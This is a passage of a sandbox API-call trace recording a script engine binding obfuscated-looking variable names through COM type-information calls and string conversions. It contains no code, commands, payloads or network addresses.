pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27c) returned 0x0 [0023.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d2a, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="pLwNywrMpvT") returned 12 [0023.244] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="pLwNywrMpvT", lHashVal=0x100fc7, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27c) returned 0x0 [0023.244] CRetailMalloc_Alloc () returned 0x78b3090 [0023.245] IUnknown:Release (This=0x2876548) returned 0x7 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0492, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_pLwNywrMpvT") returned 19 [0023.245] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_pLwNywrMpvT", lHashVal=0x100129, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.245] CRetailMalloc_Free () returned 0x1b20201 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c8c, cbMultiByte=10, lpWideCharStr=0x476230a, cchWideChar=22 | out: lpWideCharStr="csFtNHbbnD") returned 10 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798c9a, cbMultiByte=8, lpWideCharStr=0x476235c, cchWideChar=18 | out: lpWideCharStr="rfxEpKWn") returned 8 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ca8, cbMultiByte=10, lpWideCharStr=0x47623e2, cchWideChar=22 | out: lpWideCharStr="zkKuyCXSLb") returned 10 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798cb8, cbMultiByte=11, lpWideCharStr=0x4762500, cchWideChar=24 | out: lpWideCharStr="GCmStsTVCWD") returned 11 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798cca, cbMultiByte=7, lpWideCharStr=0x4762620, cchWideChar=16 | out: lpWideCharStr="CkcAgSN") returned 7 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798cd8, cbMultiByte=9, lpWideCharStr=0x4762738, cchWideChar=20 | out: lpWideCharStr="NZFPvNaUt") returned 9 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ce8, cbMultiByte=11, lpWideCharStr=0x4762854, cchWideChar=24 | out: lpWideCharStr="GvrfrndDrSF") returned 11 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d52, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZSXAkVr") returned 8 [0023.245] ITypeComp:RemoteBind (in: This=0x2876550, szName="ZSXAkVr", lHashVal=0x1083cb, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27e) returned 0x0 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d52, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZSXAkVr") returned 8 [0023.245] ITypeComp:RemoteBind (in: This=0x2875638, szName="ZSXAkVr", lHashVal=0x1083cb, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27e) returned 0x0 [0023.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d52, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZSXAkVr") returned 8 [0023.245] ITypeComp:RemoteBind (in: This=0x2876778, szName="ZSXAkVr", lHashVal=0x1083cb, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27e) returned 0x0 [0023.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d52, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZSXAkVr") returned 8 [0023.246] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ZSXAkVr", lHashVal=0x1083cb, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27e) returned 0x0 [0023.246] CRetailMalloc_Alloc () returned 0x786b680 [0023.246] IUnknown:Release (This=0x2876548) returned 0x7 [0023.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e04c2, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_ZSXAkVr") returned 15 [0023.246] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ZSXAkVr", lHashVal=0x10874f, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.246] CRetailMalloc_Free () returned 0xef90001 [0023.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d02, cbMultiByte=7, lpWideCharStr=0x4762ae4, cchWideChar=16 | out: lpWideCharStr="gWkuMCs") returned 7 [0023.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d0e, cbMultiByte=8, lpWideCharStr=0x4762b30, cchWideChar=18 | out: lpWideCharStr="kxhkZrYW") returned 8 [0023.246] CRetailMalloc_Alloc () returned 0x786d5c0 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d1c, cbMultiByte=10, lpWideCharStr=0x4762bb6, cchWideChar=22 | out: lpWideCharStr="zvaSnrYuny") returned 10 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d2c, cbMultiByte=9, lpWideCharStr=0x4762cd4, cchWideChar=20 | out: lpWideCharStr="EmkzbBuax") returned 9 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d3c, cbMultiByte=10, lpWideCharStr=0x4762df0, cchWideChar=22 | out: lpWideCharStr="UkvuyXMvzM") returned 10 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d4c, cbMultiByte=7, lpWideCharStr=0x4762f0e, cchWideChar=16 | out: lpWideCharStr="PUyyWDv") returned 7 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d5a, cbMultiByte=11, lpWideCharStr=0x4763026, cchWideChar=24 | out: lpWideCharStr="YwDLwWtwDhk") returned 11 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d76, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sCdDehrXu") returned 10 [0023.247] ITypeComp:RemoteBind (in: This=0x2876550, szName="sCdDehrXu", lHashVal=0x10b8fa, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x280 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x280) returned 0x0 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d76, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sCdDehrXu") returned 10 [0023.247] ITypeComp:RemoteBind (in: This=0x2875638, szName="sCdDehrXu", lHashVal=0x10b8fa, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x280 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x280) returned 0x0 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d76, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sCdDehrXu") returned 10 [0023.247] ITypeComp:RemoteBind (in: This=0x2876778, szName="sCdDehrXu", lHashVal=0x10b8fa, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x280 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x280) returned 0x0 [0023.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d76, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sCdDehrXu") returned 10 [0023.248] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="sCdDehrXu", lHashVal=0x10b8fa, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x280 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x280) returned 0x0 [0023.248] CRetailMalloc_Alloc () returned 0x78b3090 [0023.248] IUnknown:Release (This=0x2876548) returned 0x7 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e04ee, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_sCdDehrXu") returned 17 [0023.248] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_sCdDehrXu", lHashVal=0x10b2be, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.248] CRetailMalloc_Free () returned 0x1b20201 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d74, cbMultiByte=11, lpWideCharStr=0x47632b6, cchWideChar=24 | out: lpWideCharStr="UcDHkNdgGwS") returned 11 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d84, cbMultiByte=10, lpWideCharStr=0x476330a, cchWideChar=22 | out: lpWideCharStr="YBhPFwUnkN") returned 10 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798d94, cbMultiByte=7, lpWideCharStr=0x4763394, cchWideChar=16 | out: lpWideCharStr="BCMYsFS") returned 7 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798da2, cbMultiByte=8, lpWideCharStr=0x47634ac, cchWideChar=18 | out: lpWideCharStr="uDACKdVt") returned 8 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798db0, cbMultiByte=8, lpWideCharStr=0x47635c6, cchWideChar=18 | out: lpWideCharStr="rVeXEAtn") returned 8 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798dbe, cbMultiByte=7, lpWideCharStr=0x47636e0, cchWideChar=16 | out: lpWideCharStr="ymYBaKA") returned 7 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798dcc, cbMultiByte=11, lpWideCharStr=0x47637f8, cchWideChar=24 | out: lpWideCharStr="tPxCaGYgcHn") returned 11 [0023.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798dde, cbMultiByte=11, lpWideCharStr=0x4763918, cchWideChar=24 | out: lpWideCharStr="vFXwLZecKMt") returned 11 [0023.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d02, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="XKMKrVsuNH") returned 11 [0023.249] ITypeComp:RemoteBind (in: This=0x2876550, szName="XKMKrVsuNH", lHashVal=0x1077e0, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x27a) returned 0x0 [0023.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d02, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="XKMKrVsuNH") returned 11 [0023.249] ITypeComp:RemoteBind (in: This=0x2875638, szName="XKMKrVsuNH", lHashVal=0x1077e0, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x27a) returned 0x0 [0023.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d02, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="XKMKrVsuNH") returned 11 [0023.249] ITypeComp:RemoteBind (in: This=0x2876778, szName="XKMKrVsuNH", lHashVal=0x1077e0, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x27a) returned 0x0 [0023.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d02, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="XKMKrVsuNH") returned 11 [0023.249] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="XKMKrVsuNH", lHashVal=0x1077e0, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x27a) returned 0x0 [0023.249] CRetailMalloc_Alloc () returned 0x78b3090 [0023.249] IUnknown:Release (This=0x2876548) returned 0x7 [0023.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e051e, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_XKMKrVsuNH") returned 18 [0023.250] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_XKMKrVsuNH", lHashVal=0x10e64a, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.250] CRetailMalloc_Free () returned 0x1b20201 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798dfc, cbMultiByte=10, lpWideCharStr=0x4770fec, cchWideChar=22 | out: lpWideCharStr=0x4770fec) returned 10 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e0a, cbMultiByte=10, lpWideCharStr=0x477103e, cchWideChar=22 | out: lpWideCharStr="wLTzkvpWTZ") returned 10 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e1a, cbMultiByte=9, lpWideCharStr=0x47710c8, cchWideChar=20 | out: lpWideCharStr="PEWXYXXvD") returned 9 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e2a, cbMultiByte=10, lpWideCharStr=0x4771264, cchWideChar=22 | out: lpWideCharStr="dVtGSfaTDW") returned 10 [0023.250] CRetailMalloc_Alloc () returned 0x786d7e8 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e3a, cbMultiByte=8, lpWideCharStr=0x4771382, cchWideChar=18 | out: lpWideCharStr="HXnePFyw") returned 8 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e48, cbMultiByte=9, lpWideCharStr=0x477149c, cchWideChar=20 | out: lpWideCharStr="vCsvdTNyc") returned 9 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e58, cbMultiByte=11, lpWideCharStr=0x47715b8, cchWideChar=24 | out: lpWideCharStr="MVByGEKXEzc") returned 11 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2dc6, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="mfKAYhzVYL") returned 11 [0023.250] ITypeComp:RemoteBind (in: This=0x2876550, szName="mfKAYhzVYL", lHashVal=0x10c2f9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x284 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x284) returned 0x0 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2dc6, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="mfKAYhzVYL") returned 11 [0023.250] ITypeComp:RemoteBind (in: This=0x2875638, szName="mfKAYhzVYL", lHashVal=0x10c2f9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x284 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x284) returned 0x0 [0023.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2dc6, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="mfKAYhzVYL") returned 11 [0023.250] ITypeComp:RemoteBind (in: This=0x2876778, szName="mfKAYhzVYL", lHashVal=0x10c2f9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x284 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x284) returned 0x0 [0023.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2dc6, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="mfKAYhzVYL") returned 11 [0023.251] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="mfKAYhzVYL", lHashVal=0x10c2f9, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x284 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x284) returned 0x0 [0023.251] CRetailMalloc_Alloc () returned 0x78b3090 [0023.251] IUnknown:Release (This=0x2876548) returned 0x7 [0023.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e054e, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_mfKAYhzVYL") returned 18 [0023.251] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_mfKAYhzVYL", lHashVal=0x103124, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.251] CRetailMalloc_Free () returned 0x1b20201 [0023.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e70, cbMultiByte=8, lpWideCharStr=0x477186c, cchWideChar=18 | out: lpWideCharStr="VzznTVmW") returned 8 [0023.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e7c, cbMultiByte=8, lpWideCharStr=0x47718ba, cchWideChar=18 | out: lpWideCharStr="LzxWFuCL") returned 8 [0023.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e8a, cbMultiByte=8, lpWideCharStr=0x4771940, cchWideChar=18 | out: lpWideCharStr="mgeVcxVF") returned 8 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798e98, cbMultiByte=11, lpWideCharStr=0x4771a5a, cchWideChar=24 | out: lpWideCharStr="BZkUkGtsBfC") returned 11 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798eaa, cbMultiByte=11, lpWideCharStr=0x4771b7a, cchWideChar=24 | out: lpWideCharStr="bnTaUYFmsdT") returned 11 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ebc, cbMultiByte=8, lpWideCharStr=0x4771c9a, cchWideChar=18 | out: lpWideCharStr="ZdeYysxR") returned 8 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798eca, cbMultiByte=7, lpWideCharStr=0x4771db4, cchWideChar=16 | out: lpWideCharStr="fDSwgeE") returned 7 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798ed8, cbMultiByte=10, lpWideCharStr=0x4771ecc, cchWideChar=22 | out: lpWideCharStr="PCMpMucuwM") returned 10 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d9e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="mwDRyVaab") returned 10 [0023.252] ITypeComp:RemoteBind (in: This=0x2876550, szName="mwDRyVaab", lHashVal=0x104678, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x282 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x282) returned 0x0 [0023.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d9e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="mwDRyVaab") returned 10 [0023.252] ITypeComp:RemoteBind (in: This=0x2875638, szName="mwDRyVaab", lHashVal=0x104678, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x282 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x282) returned 0x0 [0023.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d9e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="mwDRyVaab") returned 10 [0023.253] ITypeComp:RemoteBind (in: This=0x2876778, szName="mwDRyVaab", lHashVal=0x104678, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x282 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x282) returned 0x0 [0023.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2d9e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="mwDRyVaab") returned 10 [0023.253] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="mwDRyVaab", lHashVal=0x104678, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x282 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x282) returned 0x0 [0023.253] CRetailMalloc_Alloc () returned 0x78b3090 [0023.253] IUnknown:Release (This=0x2876548) returned 0x7 [0023.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e057e, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_mwDRyVaab") returned 17 [0023.253] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_mwDRyVaab", lHashVal=0x10403c, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.253] CRetailMalloc_Free () returned 0x1b20201 [0023.255] CRetailMalloc_Alloc () returned 0x78b3090 [0023.257] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x572d60c, ppTLib=0x12506c, pIndex=0x0 | out: ppTLib=0x12506c*=0x2876548, pIndex=0x0) returned 0x0 [0023.257] ITypeLib:RemoteGetLibAttr (in: This=0x2876548, ppTLibAttr=0x125064, pDummy=0x0 | out: ppTLibAttr=0x125064, pDummy=0x0) returned 0x0 [0023.257] ITypeLib:LocalReleaseTLibAttr (This=0x2876548) returned 0x55d8dc8 [0023.257] IUnknown:Release (This=0x2876548) returned 0x7 [0023.257] ITypeInfo:RemoteGetDllEntry (in: This=0x572d60c, memid=1610612745, invkind=1, refPtrFlags=0x12506c, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x1250a4 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x1250a4*=0x8e0) returned 0x0 [0023.257] 